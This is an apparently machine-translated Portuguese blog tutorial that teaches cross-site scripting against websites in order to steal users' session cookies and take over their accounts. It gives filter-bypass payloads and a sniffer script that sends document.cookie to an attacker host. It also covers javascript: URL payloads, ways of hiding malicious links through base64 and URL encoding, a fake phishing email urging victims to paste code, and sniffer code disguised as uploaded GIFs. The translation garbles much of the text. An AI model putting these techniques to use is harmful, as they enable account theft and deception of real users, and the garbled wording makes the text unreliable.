XSS - Cross Ste Scripting (CSS já tomadas Cascade Style Sheets). A vulnerabilidade ocorre devido à filtragem de entrada insuficiente pelos utilizadores e, subsequentemente, exibida nas páginas de dados. Ele permite que você publique diretamente no site arbitrário html-code (respectivamente, o código será executado para todos os usuários que vêm para a página).
Vamos pensar sobre o que queremos dizer a essas oportunidades. O que você pode fazer coisas interessantes com a ajuda de html. Bem, em primeiro lugar, você pode simplesmente: trazer inscrição enorme (sim, qualquer formatação do texto em html) ou colocar um redirecionamento para outro site (para falso, é claro). Redirecionar, se alguma coisa, é feito da seguinte forma:
Código
. Você também pode preencher um exploit ou executar qualquer código javascript (como dizem, onde o HTML, JavaScript e ali). Implementação de nossa js-código, por sua vez, faz com que seja possível pedir os dados de autenticação do usuário - biscoitos (eles são os mesmos biscoito, biscoitos e cookies). Estes são arquivos temporários que são armazenados no navegador do usuário após o login. Em alguns casos, você pode substituir o cookie emprestado ao invés de seu próprio e, portanto, para efetuar o login no rosto das outras pessoas. Mas enquanto isso não é importante para nós. Em primeiro lugar, é necessário vulnerabilidade ... para encontrar!
Vulnerabilidade Pesquisa
Para encontrar XSS, você precisa verificar a sua presença todos os sites potencialmente vulnerável. Neste caso, estes são campos de entrada de texto, que posteriormente serão exibidos no site (campo printabelnye). Este campo pode ser o envio de uma mensagem, o assunto da mensagem, etc. Ela deve ser verificada em busca de vulnerabilidades de cada tal campo. Para esta série poizvodim todos descritos a seguir, desde até que vejamos uma mensagem semelhante:
Então, começamos a procurar - substituto em todo o campo printabelnye o seguinte código:
Código
alert ('')
Nada? OK, tente o seguinte:
Código
"> Alert ('')
Novamente, nada!? > Avançado -> Gerenciar cookies.
TPER precisa encontrar a pasta para um site, e substituir os nossos cookies para aqueles que vieram para o sniffer. Eu acho que não há grande coisa. Os cookies vêm na forma name = value;. Um diretório é apenas uma lista de nomes. Clique duas vezes - abre uma janela. Substitua o "valor" e picar aprox. Então, até você substituir tudo o que tínhamos. Agora feche a gestão de cookies e atualizar a página. Se tudo for feito corretamente - você vai se tornar aqueles cujos biscoitos enquadrada (registro em sua conta)!
Apêndice 1
Pesquisa e filtros contornando
Retocar um ponto da parte principal da aula:
Citação
Apreciando LAS páginas (fonte) e está procurando há algo semelhante ao código acima (ou seja, olhando para o que temos introduzido). Encontrado? Olha o que aconteceu ao nosso código. O mais provável, foi filtrada caracteres especiais. Sem eles o código para trabalhar, é claro, não vai ser ... Eles mataram o script! Bastards! xD Filtering esses símbolos significar uma coisa: não há xss ativa. Mas não se desespere, ainda há uma opção com xss passiva e até mesmo ter a chance de ignorar a filtragem! Mas mais sobre isso mais tarde (em um curto adendo à lição).
Durante a busca, você está garantido para XSS será confrontado com uma filtração similar. Se alguma coisa pode ser filtrada não só os personagens, mas muitos outros não são menos importantes para o ataque (a introdução do código de trabalho). Entre eles:
Código
<> = () / "" +
Verifique o filtro
Basta colocar no campo printabelnoe todos os caracteres necessários, e depois olhar para eles no código fonte da página. Ela torna mais fácil para olhar, você pode adicionar mais no meio de uma palavra, por exemplo. XSS apenas um guia.
Encontrado? Ver o que é deixado no local, e que o "mutilado" pelo filtro.
Devo dizer que, se esses personagens (embora alguns de nós, exceto o direito) é substituída por outra coisa se removido, deixar todas as suas tentativas fúteis para injetar código!
Se você simplesmente remover os caracteres, você pode tentar colocar a tag (chamada Owned esses suportes e palavras-chave em-los), e um filtro ou perder, e não removê-lo (porque agora a marca não está vazia), ou filtrar como a tag proibido. Se você perder - tudo lindo, ir para inserir o código necessário para nós (código sniffer para roubar cookies, lembra?). E se você estupidamente removido substituindo algo como isto:
Código
Muito provavelmente, o filtro remove apenas no meio, e nós vamos ter um tag de trabalho. Se ao menos ele seja removido novamente, e deixou naked "ssript", em seguida, um fiasco óbvio e vulnerabilidade lá.
Bem, se todos os mesmos filtros não fazer sempre? Vamos experimentar e experimentar tudo a mesma coisa para exibir uma mensagem (alerta) com o texto!
Vamos começar com o fato de que o zabem clássico e substituí-lo com alguma outra tag. Assim, se o alerta é apresentada da seguinte forma:
Código
alert ('XSS')
variações nas diferentes marcas que você pode tentar construir algo fora deste:
Código
alert ('XSS');
Atenção Segundo alguns relatos, o código na tag IMG pode não funcionar no seu browser, Mozilla Firefox, por isso é preferível evitar o uso dessa marca.
Em geral, a experiência com etiquetas, ver como eles mudam, analisar o comportamento do filtro e, eventualmente, encontrar uma combinação de trabalho!
Da leitura todo o exposto pode ser uma conclusão decepcionante que o xss ativa - uma coisa delicada, e até mesmo um simples filtro, para filtrar apenas os caracteres, não podemos opor a qualquer coisa. Mas nem todo filtro filtra, e programadores inexperientes costumam colocar uma proibição apenas, e todos nós sabemos que você não só pode usar essa tag.
Apêndice 2
Passivo XSS
Eu acho que li o artigo principal com a adição e isso todos já sabem tudo sobre o xss? Radutes cedo! Até este ponto temos discutido apenas o XSS ativo, que é integrado ao corpo da página e salvo. Agora seria bom para encontrar mais e passiva XSS. Eles se opõem à ativa é que nós não implementar passivki no corpo da página, e na barra de endereços, e nosso código xss não serão armazenados no site para a sua implementação terá que vender para o código do link vítima. Mas toda essa conversa em detalhe mais tarde. Então, o que fazemos rosto inteligente e começam a penetrar! xD
Vulnerabilidade Pesquisa
Como você se lembra, procure aktivok, substituímos o script em tudo printabelnye campo. Agora vamos realizar um ritual semelhante, só que o código será substituído na barra de endereços (claro, em diferentes páginas). Em relação à barra de endereços explicar ...
Suponha que há um _http endereço:? //site.com/index.php Página = 1 O fato de que há depois do sinal? (Página = 1) - são os dados no servidor para o script (nome do script vai para - index.php?) get-solicitação. Os dados em si são da forma "chave = valor" (page = 1). Aqui estão nossos scripts vamos expô-la como um valor (depois =). Contanto que você precisa ler de bom para aprender a olhar como o endereço para o qual você pode empurrar através de XSS (caso contrário, você vai olhar para essas vulnerabilidades?), E sites com passivos de formação pode ser encontrada aqui.
Então, vamos substituir a verificação após = vira alertas de script em várias formas:
Código
alert ('XSS')
"> Alert ('XSS')
">"> Alert (/ XSS /)
Colocado após o primeiro = primeiro roteiro, nós pressionamos enterite, à espera do fim do carregamento da página. Então iteração até que vejamos a mesma janela cobiçado do alerta (a imagem foi acima). Se a expansão deu nada, ignorando os filtros de fumaça (veja. Ext. 1).
Exploração
Quando ele veio para aktivkah, nós conversamos sobre isso na página poderia implementar qualquer código. Com as coisas passivki são exatamente os mesmos, mas porque a página com código incorporado não é armazenada em qualquer lugar e pode ser transferido para a vítima apenas como uma ligação com xss-code, é muitas vezes só usar essa vulnerabilidade para roubar as informações de autenticação (cookies).
Então, agora, em vez de roteiro inofensivo com um alerta deve ser introduzido sniffer criptas. Aqui surgem problemas, tais como um conjunto de símbolos usados num script que pode ser filtrado, e um comprimento significativo do código introduzido. Resolver será muito simples: host sniffer Código para hospedar (você pode até mesmo local onde sniffer xD), mas no xss só irá chamar esse script. Como é implementado?
Em vez de o valor na barra de endereço (onde acionou o alerta na busca) inserir este código:
Code
Um ponto importante: se um alerta tropeçou código onde antes ficava outra coisa (por exemplo, um alerta avarias porque: "> alert ('XSS')), é algo (neste caso">) terá de sair e antes código sniffer!
By the way, não se esqueça de substituir o código yourhost.com no endereço real do seu host onde o roteiro será baseado. Agora o que diz respeito ao script: arquivo script.js tem o conteúdo:
Código
img = new Imagem (); img.src = "http://yourhost.com/s.gif" + document.cookie;
location.href = "http://google.com"
Onde s.gif - uma imagem de seu sniffer, assim, cerca de yourhost.com dizer Capitão Óbvio. xD
A segunda linha - para desviar para outras posições (neste caso, o Google =)). Se você quiser manter o usuário na mesma página, onde tem sido deixar aspas vazias. Mas não remover a linha de redirecionamento! Caso contrário, o usuário permanecerá na página com uma imagem de seu sniffer e pode cheirar um rato ... (não sei o que ele faria, mas o que mais uma vez palitsya e perturbar os usuários nervosas? XD)
Agora, quando você clicar no link do seu venenoso (que vai olhar _http: //site.com/index.php Página =?) Vai começar código sniffer, o que, por sua vez, escreve um cookie para o registo, e em seguida, deixar a vítima em sozinho, ou se espalhar para outro site.
Na verdade, todos os códigos, assim como script.js arquivo fornecido minha tubo aspirador. Aproveite a sua corte!
Apêndice 3
Criptografar um link suspeito
Mais pouca add ... IMHO permitir que os usuários (e, mais ainda, administradores) aqui estão os links
Código
http://site.com/index.php?page=
sem criptografia muito incriminadora ... você não acha? Agora vamos ocultá-los!
Método 1: stomp no tinyurl.com e tentar dirigir ao nosso link. A resultante ... outra curta e misteriosa O resultado de seu trabalho - o mesmo: Banana:piscadela
Método 2: serão criptografadas na base de 64. Nós viemos aqui e colocar em um campo de nosso link. Nós pressionamos "Encode" e obter:
Citação
aHR0cDovL3d3dy5jLXNwYW52aWRlby5vcmcvdmlkZW9MaWJyYXJ5L3NlYXJjaC1yZXN1bHRzLnBocD9rZXlbXT08U0NSSVBUIHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz1odHRwOi8v aHR0cHoucnUvZzRjdXdsNDhlZGdvLmpzPjwvU0NSSVBUPiI =
Ele é a nossa referência em base64. Agora é possível apresentá-lo como uma vítima
Citação
data:text/html;base64,aHR0cDovL3d3dy5jLXNwYW52aWRlby5vcmcvdmlkZW9MaWJyYXJ5L3NlYXJjaC1yZXN1bHRzLnBocD9rZXlbXT08U0NSSVBUIHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz1odHRwOi8v aHR0cHoucnUvZzRjdXdsNDhlZGdvLmpzPjwvU0NSSVBUPiI =
Método 3: na url codificar uma parte venenosa do link. Codificação pode ser encontrada aqui. Ficamos com um link como este:
Citação
http://site.com/index.php?page=%3CSCRIPT%20type%3Dtext%2Fjavascript%20src%3Dhttp%3A%2F%2Fhttpz.ru%2Fg4cuwl48edgo.js%3E%3C%2FSCRIPT%3E%22
Em todos os 3 casos, o resultado do trabalho e como usar a referência de um e o mesmo. Não se esqueça que, ao mesmo tempo mais necessário aplicar corretamente a SI, a vítima foi para o link, hospedado em um site segmentado!
Apêndice 4
Auto-suficiente XSS
Finalmente nós chegamos a este último tipo de xss! De acordo com a técnica destes ataques XSS, talvez a mais simples. Não há necessidade de olhar para todas as vulnerabilidades, ele não precisa ter medo de filtragem no local e cuidar dele indo por aqui, exceto para o ataque vítima inocente geralmente não precisa (e é, caramba, a principal desvantagem). O ponto de ataque é que nós vparivayut vítima veneno código sniffer a partir da imagem, como antes, ele insere o código na barra de endereços, por isso é executado, mas ...
1) o código - nenhuma ligação, por isso vai trabalhar com qualquer site. Ou seja, a vítima pode até mesmo executar o código na nova janela e não biscoitos não virá ((
2) a vítima pode suspeitar que algo estava errado quando você não pode simplesmente clicar no link, e você precisa dele para copiar o endereço.
Embora esses problemas são facilmente resolvidos com a ajuda de SI (engenharia social). É possível, por exemplo, para dizer:
Citação
Oh, olhe o quão engraçado para encontrar! =) Então, se há um endereço inserido aqui está:
Em suma, eu não vou dizer, mas não é tão interessante;)
Mas, se a vítima for ... loira estúpida curiosa \ \ (sublinhado). Apesar de curiosidade muitas vezes tem precedência sobre o senso comum ... mesmo quando o senso comum diz, "link não é familiar. ...!" Se o seu objetivo - menos propícios a qualquer "pessoa estúpido" Uma pessoa pode oferecer tal opção:
Citação
Boa tarde, caro nome de usuário!
Você recebeu esta mensagem porque você registrado neste site de alguma forma.
Hoje, aproximadamente às 2:00 banco de dados do servidor falhou (as palavras mais inteligente, melhor!). As razões para o fracasso não são conhecidos neste momento há uma suposição de que o servidor está cortado. Uma vez que o banco de dados estava em um nome de usuário e senha do servidor, talvez roubar dados do usuário.
A fim de proteger os dados pessoais dos usuários, todas as contas que não passam o processo de verificação e alterar a senha será excluída dias vtechenie. Por favor, verifique o seu, não vai tomar muito do seu tempo: (suavizar ameaça excluir sua conta pedido educado =))
1) Verifique se você pode login usando seu nome de usuário e senha. (aqui é possível ter certeza mesmo um link para um falso)piscadela
2) Alterar a sua senha. (isto não é obrigatório, mas é altamente recomendável para alterar a senha para a sua segurança!)
3) Insira o código de confirmação na barra de endereços, sendo na sua conta pessoal no site.
Código de confirmação:
========================
========================
Atenção Não encerre a sua sessão no site (usando o botão de saída) por um tempo, ou até a conclusão de verificar todas as contas, ou a sua confirmação pode ser cancelada. No fim do ensaio, todos os usuários serão notificados por e-mail.
Obrigado pela cooperação. \ Obrigado com a gente! (a gosto)
A administração do site.
_______________
Esta mensagem é enviada para o sistema de distribuição automatizada, a resposta não é necessária.
Então, foi apenas alguns exemplos de aplicação do SI nesta situação, eu acho que com código para deixar tudo claro. =)
Algo me trouxe para outro tópico, e eu estava distraído (bem, nada, ele também pode vir a calhar) ...
Tudo o mesmo de volta ao ponto ... Como você sabe, o código é executado quando você colar na barra de endereços e clique em Enter. Tente colocá-lo em (o código familiar, e =?)):
Código
javascript: alert ('')
Eu acho que um monte de explicação não é necessário, para que o código (na minha montagem farejadores houver):
Código
javascript: document.write ('img = new Imagem (); img.src = "http://yourhost.com/s.gif?" + document.cookie; location.href = ""')
Se você quiser manter após a execução do código pelo qual ele estava, para que o script fez)) E se você precisa adicionar o redirecionamento acrescentar após 2 frases location.href endereço onde você deseja redirecionar. Por exemplo:
Código
javascript: document.write ('img = new Imagem (); img.src = "http://yourhost.com/s.gif?" + document.cookie; location.href = "http: // adres_redirekta /"' )
E, no entanto, se você tiver usado a lenda do "código de confirmação" pode, no final do script para adicionar algo como isso (para acalmar usuário ansioso):
Código
('# Conta foi confirmada com sucesso Kod200!') Alerta;
Por menos endereços incriminatórias e código mais misterioso (de modo que os usuários a entender o desejo desapareceu), você pode usar exatamente os mesmos métodos de criptografia como os enumerados no anexo 3.
Por que isso é parte do pago muito atenção para a SI? Sim, porque, no caso de um auto-suficiente complexidades XSS da parte técnica de um pouco menos de nicrómio, e mais importante - de forma discreta, mas clara e convincente explicar à vítima, onde e como incorporar código.
Bem, ele encaminha para enviar serviços de correio anônimos para enviar nosso código! xD
Suplemento 5
Derramando através de arquivos de código
Voltei e decidi descrever um par de métodos inserir xss código! * Risos * atsky
Existem muitos sites sobre a possibilidade de fazer upload de imagens, e às vezes até Animação em Flash (!) Straight to as páginas do site (ou blog ou fórum). E eu não estou falando sobre o que vimos VKontakte quando as imagens são transferidas para o servidor, e, em seguida, ele é processado para adicionar à página e, quando damos um link para a imagem e é a sua inserção direta da página. O pecado não é de aproveitar esta oportunidade! O truque é que você pode, de facto, na imagem e inserir o sniifera código e vamos, portanto, ativamente xss (que por razões óbvias é mais valioso e passivos mais eficientes), estará sujeito a ataques, porque todo mundo que conhece a imagem no site.
Imagem código de pelúcia
É tudo simples. Crie um arquivo com o conteúdo de um código para passivos:
Código
img = new Imagem ();
img.src = "http://yourhost.com/s.gif?"+document.cookie;
E salva com a extensão .gif Agora derramá-lo em qualquer hospedagem, para obter um link direto para a imagem sem qualquer alteração.
Agora você pode colocar uma foto em fóruns, blogs, cama e em qualquer lugar lá inserir imagens.
este chip pode ser realizada não apenas com a imagem inserida, e quaisquer outros arquivos em casos quando um arquivo é possível encher o site e se o seu conteúdo será exibido na página.

0 comentários :
Postar um comentário